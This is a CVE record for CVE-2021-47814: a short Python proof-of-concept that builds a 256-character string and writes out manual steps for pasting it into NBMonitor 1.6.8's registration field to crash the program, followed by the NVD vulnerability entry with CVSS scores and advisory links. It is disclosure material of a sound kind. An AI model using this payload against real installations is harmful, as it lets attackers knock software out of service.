CVE-2021-47814

# CVE-2021-47814 PoC - NBMonitor Buffer Overflow DoS # Description: NBMonitor 1.6.8 registration code field buffer overflow # CVSS: 7.5 (High) import struct def generate_overflow_payload(length=256): """Generate buffer overflow payload for registration code field""" # 256 characters buffer to overflow the registration key input # This triggers application crash due to stack overflow overflow_string = 'A' * length return overflow_string def create_poc_file(): """Create PoC demonstration file""" payload = generate_overflow_payload(256) poc_script = ''' #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ CVE-2021-47814 PoC - NBMonitor 1.6.8 DoS This PoC demonstrates buffer overflow in registration code validation """ def exploit(): # Generate 256-byte payload to overflow registration field payload = "A" * 256 # For manual testing: # 1. Launch NBMonitor 1.6.8 # 2. Navigate to registration/license activation screen # 3. Paste the 256-character payload into registration key field # 4. Submit the form to trigger crash print("[*] CVE-2021-47814 PoC") print(f"[*] Payload length: {len(payload)}") print(f"[*] Payload preview: {payload[:32]}...") print("[+] Payload generated for testing") return payload if __name__ == "__main__": exploit() ''' with open('CVE-2021-47814_poc.py', 'w', encoding='utf-8') as f: f.write(poc_script) print(f"[+] PoC file created: CVE-2021-47814_poc.py") print(f"[+] Payload: {payload}") if __name__ == "__main__": create_poc_file()

{"cve": {"id": "CVE-2021-47814", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:26.830", "lastModified": "2026-01-29T19:20:09.797", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NBMonitor 1.6.8 contains a denial of service vulnerability that allows attackers to crash the application by overflowing the registration code input field. Attackers can paste a 256-character buffer into the registration key field to trigger an application crash and potential system instability."}, {"lang": "es", "value": "NBMonitor 1.6.8 contiene una vulnerabilidad de denegación de servicio que permite a los atacantes bloquear la aplicación desbordando el campo de entrada del código de registro. Los atacantes pueden pegar un búfer de 256 caracteres en el campo de clave de registro para desencadenar un bloqueo de la aplicación y una posible inestabilidad del sistema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nsasoft:nbmonitor:1.6.8:*:*:*:*:*:*:*", "matchCriteriaId": "6EC834C7-6AEC-4A15-A9A0-87B55D263E86"}]}]}], "references": [{"url": "http://www.nsauditor.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/49964", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/nbmonitor-denial-of-service-poc", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}